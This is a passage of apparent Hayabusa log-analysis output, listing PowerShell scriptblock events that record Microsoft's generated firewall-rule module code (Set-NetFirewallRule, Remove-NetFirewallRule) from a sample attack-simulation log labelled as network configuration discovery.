$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__c",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"mdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 